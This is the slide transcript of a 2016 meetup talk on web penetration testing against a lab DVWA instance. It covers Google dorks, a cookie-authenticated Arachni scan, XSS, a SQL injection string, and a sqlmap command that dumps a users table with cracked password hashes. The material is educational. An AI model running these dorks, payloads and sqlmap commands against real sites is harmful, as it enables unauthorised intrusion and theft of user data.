Upgrade to Pro — share decks privately, control downloads, hide ads and more …

I want to be a Hacker v3.0

Jakub Gadkowski
February 04, 2016
Technology
0
210

I want to be a Hacker v3.0

Let's go on a journey through a simple pentest from start (recon) through the fun stuff (testing and exploiting) to boring necessity (writing report).
Presented at Groningen PHP on 4th of February 2016

Jakub Gadkowski

February 04, 2016
Tweet

More Decks by Jakub Gadkowski

See All by Jakub Gadkowski
Software Architecture Anti-patterns
jakubgg
1
220
Do you think you are secure?
jakubgg
0
95
I want to be a hacker... but I only look good in a white hat v2.0
jakubgg
0
81
I want to be a hacker... but I only look good in a white hat
jakubgg
0
210

Other Decks in Technology

See All in Technology
【令和最新版】AWS Direct Connectと愉快なGWたちのおさらい
minorun365
PRO
5
760
AI前提のサービス運用ってなんだろう?
ryuichi1208
8
1.4k
Amplify Gen2 Deep Dive / バックエンドの型をいかにしてフロントエンドへ伝えるか #TSKaigi #TSKaigiKansai #AWSAmplifyJP
tacck
PRO
0
390
インフラとバックエンドとフロントエンドをくまなく調べて遅いアプリを早くした件
tubone24
1
430
Flutterによる 効率的なAndroid・iOS・Webアプリケーション開発の事例
recruitengineers
PRO
0
110
誰も全体を知らない ~ ロールの垣根を超えて引き上げる開発生産性 / Boosting Development Productivity Across Roles
kakehashi
1
230
TypeScriptの次なる大進化なるか!? 条件型を返り値とする関数の型推論
uhyo
2
1.7k
B2B SaaSから見た最近のC#/.NETの進化
sansantech
PRO
0
870
Shopifyアプリ開発における Shopifyの機能活用
sonatard
4
250
Terraform CI/CD パイプラインにおける AWS CodeCommit の代替手段
hiyanger
1
240
Lambda10周年!Lambdaは何をもたらしたか
smt7174
2
110
Incident Response Practices: Waroom's Features and Future Challenges
rrreeeyyy
0
160

Featured

See All Featured
Typedesign – Prime Four
hannesfritz
40
2.4k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
232
17k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
6.8k
Large-scale JavaScript Application Architecture
addyosmani
510
110k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
47
2.1k
Statistics for Hackers
jakevdp
796
220k
Navigating Team Friction
lara
183
14k
Product Roadmaps are Hard
iamctodd
PRO
49
11k
Bootstrapping a Software Product
garrettdimon
PRO
305
110k
How STYLIGHT went responsive
nonsquared
95
5.2k
Documentation Writing (for coders)
carmenintech
65
4.4k
Visualization
eitanlees
145
15k

Transcript

  1. I WANT TO BE A HACKER BUT I ONLY LOOK

    GOOD IN A WHITE HAT V3.0

  2. JAKUB GADKOWSKI CTO and Senior developer at: Helping to make

    awesome @jakubga WHOAMI

  3. WHY BOTHER WITH PEN TESTING?

  4. IDEAL WORLD

  5. REAL LIFE

  6. THE BAD GUYS

  7. HOW TO PENTEST WEBSITE

  8. LET ME INTRODUCE:

  9. RECON

  10. RECON-NG

  11. CMSMAP

  12. GOOGLE

  13. • Data mining:
 site:target.com filetype:doc • SQL Injection/DB identification:
 site:target.com

    "supplied argument is not a valid MySQL” • For more check “Exploit Database”:
 https://www.exploit-db.com/google-hacking-database/ GOOGLE

  14. GOOGLE DORKS

  15. TESTING FOR VULNERABILITIES

  16. BUT FIRST…

  17. SESSION STEALING TIME!

  18. LOG IN

  19. AND GRAB THE COOKIE

  20. ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php --session-check- pattern="<div class="message">You

    have logged in as 'admin'</div>" --session-check- url=index.php ARACHNI

  21. TARGET ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php --session-check- pattern="<div

    class="message">You have logged in as 'admin'</div>" --session-check- url=index.php

  22. COOKIE ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php --session-check- pattern="<div

    class="message">You have logged in as 'admin'</div>" --session-check- url=index.php

  23. EXCLUDE FROM SCAN ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php

    --session-check- pattern="<div class="message">You have logged in as 'admin'</div>" --session-check- url=index.php

  24. LOGGED IN CHECK ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php

    --session-check- pattern="<div class="message">You have logged in as 'admin'</div>" --session-check- url=index.php

  25. ./arachni http://192.168.33.201 --http-cookie-string="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" --scope-exclude-pattern=logout.php --scope- exclude-pattern=login.php --session-check- pattern="<div class="message">You

    have logged in as 'admin'</div>" --session-check- url=index.php LOGGED IN CHECK

  26. RELEASE THE KRAKEN

  27. AN HOUR LATER…

  28. IS THAT IT?

  29. IT’S PRETTY!

  30. REFLECTED XSS

  31. REFLECTED XSS

  32. REFLECTED XSS

  33. REFLECTED XSS

  34. REFLECTED XSS

  35. REFLECTED XSS

  36. PERSISTENT XSS

  37. PERSISTENT XSS

  38. PERSISTENT XSS

  39. PERSISTENT XSS

  40. PERSISTENT XSS

  41. HACKING INTENSIFIES!

  42. SQL INJECTION

  43. FIRST STEP

  44. FIRST STEP SUBMIT ID 1

  45. FIRST STEP CONT.

  46. NEXT STEP SUBMIT ID 1’ OR 1=‘1’#

  47. GOTCHA!

  48. EXPLOIT sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/? id=1&Submit=Submit#" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL -- os=Linux --cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  49. WHAT?

  50. SQLMAP sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  51. TARGET ADDRESS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  52. THREADS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  53. RISK sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  54. LEVEL sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  55. TABLES sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  56. KNOWN FACTORS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  57. COOKIE sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables --dbms=MySQL

    --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  58. ONE COOKIE IS PLENTY sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1

    --level=1 --tables --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  59. KNOWN PARAMS sqlmap -u "http://192.168.33.201/ vulnerabilities/sqli/?id=1&Submit=Submit" --threads=3 --risk=1 --level=1 --tables

    --dbms=MySQL --os=Linux -- cookie="security=low; PHPSESSID=qlu6ce3bfta2c54csam3cl4g85" -- drop-set-cookie --skip=Submit

  60. INJECTING BEGINS

  61. INJECTING CONTINUES

  62. STILL NOT HAPPY!

  63. I WANT USERS! LET’S CHANGE THIS: --TABLES INTO THIS: --DUMP

    -D DVWA -T USERS

  64. LET’S CHANGE THIS: --TABLES INTO THIS: --DUMP -D DVWA -T

    USERS I WANT USERS!

  65. LET’S CHANGE THIS: --TABLES INTO THIS: --DUMP -D DVWA -T

    USERS I WANT USERS!

  66. USERS SERVED, SIR.

  67. HASHED PASSWORD?

  68. SMELL OF VICTORY Database: dvwa Table: users [5 entries] +---------+---------+---------------------------------------------+-----------+------------+

    | user_id | user | password | last_name | first_name | +---------+---------+---------------------------------------------+-----------+------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +---------+---------+---------------------------------------------+-----------+------------+

  69. ARE WE THERE YET?

  70. NOT YET, NOW WE HAVE TO…

  71. WRITE A REPORT

  72. WRITING A REPORT •Environment •Tools you used •Your findings

  73. WRITING A REPORT Each finding should contain (at least): -

    Title - Severity - Detailed description (pictures or it didn’t happened) - PoC (with examples of links/payload)

  74. •ORG (OWASP Report Generator) •MagicTree • SimplE RePort wrIting and

    COllaboration (Serpico) WRITING A REPORT

  75. ARE WE THERE YET?

  76. ALTERNATIVE TOOLS

  77. OWASP (ZED ATTACK PROXY) ZAP

  78. OWASP (ZED ATTACK PROXY) ZAP

  79. ZAP QUICK SCAN

  80. ZAP QUICK SCAN

  81. ZAP REPORT

  82. ZAP PROXY

  83. ZAP PROXY

  84. ZAP PROXY

  85. WPSCAN

  86. RESOURCES

  87. KALI (AKA BACKTRACK) https://www.kali.org/

  88. BACKBOX http://www.backbox.org/

  89. OWASP The Open Web Application Security Project https://www.owasp.org/

  90. OFFENSIVE SECURITY EXPLOIT DATABASE ARCHIVE https://www.exploit-db.com/

  91. DAMN VULNERABLE WEB APPLICATION https://github.com/RandomStorm/DVWA

  92. SECURITY TESTER'S COMPANION https://github.com/danielmiessler/SecLists

  93. Awesome list of security related tools with links and descriptions:

    http://tools.kali.org/tools-listing Application Security Learning Resources: https://github.com/paragonie/awesome-appsec/blob/master/README.md Great resource about pentesting http://www.pentest-standard.org/index.php LEARNING

  94. Tons of links to security talks on YouTube https://github.com/PaulSec/awesome-sec-talks Google

    If you do not know its web address, just google it. LEARNING

  95. THANK YOU!